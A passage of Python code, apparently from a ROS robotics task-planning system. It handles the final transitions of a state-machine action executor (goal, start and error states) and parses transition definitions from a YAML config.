            elif to_state == "goal_state":
                # If this fsm is also a state in another fsm pass the status
                if self._parent_ai is not None:
                    self._parent_ai.pass_child_action_finished_cb("succeeded", dispatch_msg)
                else:
                    # Otherwise, if this fsm is on the highest level, finalize
                    rospy.loginfo('KCL: ({}) Plan {} Action {}: State machine {} finished to goal state'.format(rospy.get_name(),
                                                                                                               dispatch_msg.plan_id,
                                                                                                               dispatch_msg.action_id,
                                                                                                               self.get_action_name()))
                    # Apply the end effects
                    self._kb_link.kb_apply_action_effects(dispatch_msg, 1)
                    # Publish feedback: action succeeded to goal state
                    self._publish_feedback(dispatch_msg, ActionFeedback.ACTION_SUCCEEDED_TO_GOAL_STATE)
                # Break the while loop
                fsm_execution_completed = True
            # If this function was called from the start state of the fsm
            elif to_state == "start_state":
                # If this fsm is also a state in another fsm pass the status
                # ToDo: Check what should be passed to a higher level fsm
                if self._parent_ai is not None:
                    self._parent_ai.pass_child_action_finished_cb("succeeded", dispatch_msg)
                else:
                    # Otherwise, if this fsm is on the highest level, set the final status
                    rospy.loginfo('KCL: ({}) Plan {} Action {}: State machine {} finished to start state'.format(rospy.get_name(),
                                                                                                                 dispatch_msg.plan_id,
                                                                                                                 dispatch_msg.action_id,
                                                                                                                 self.get_action_name()))
                    # Apply the end effects
                    self._kb_link.kb_undo_action_effects(dispatch_msg, 0)
                    # Publish feedback: action succeeded to start state
                    self._publish_feedback(dispatch_msg, ActionFeedback.ACTION_SUCCEEDED_TO_START_STATE)
                # Break the while loop
                fsm_execution_completed = True
            # If this function was called from an error state of the fsm
            elif to_state == "error_state":
                rospy.logwarn(
                    'KCL: ({}) Plan {} Action {}: State machine {} error. Human intervention needed'.format(rospy.get_name(),
                                                                                                            dispatch_msg.plan_id,
                                                                                                            dispatch_msg.action_id,
                                                                                                            self.get_action_name()))
            else:
                rospy.logwarn(
                    'KCL: ({}) Plan {} Action {}: State machine {} error: Transition to unknown state'.format(
                        rospy.get_name(),
                        dispatch_msg.plan_id,
                        dispatch_msg.action_id,
                        self.get_action_name()))

    def parse_transitions(self, state):
        """Parse the 'transitions' section of a state config.

        Returns a dict mapping each outcome ("succeeded"/"failed") to a list
        of Transition objects, in the order given by the input yaml.
        """
        transitions = {"succeeded": [], "failed": []}
        for outcome in ("succeeded", "failed"):
            for transition in state["transitions"][outcome]:
                transitions[outcome].append(Transition(transition["to_state"], transition["effects"]))
        return transitions
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.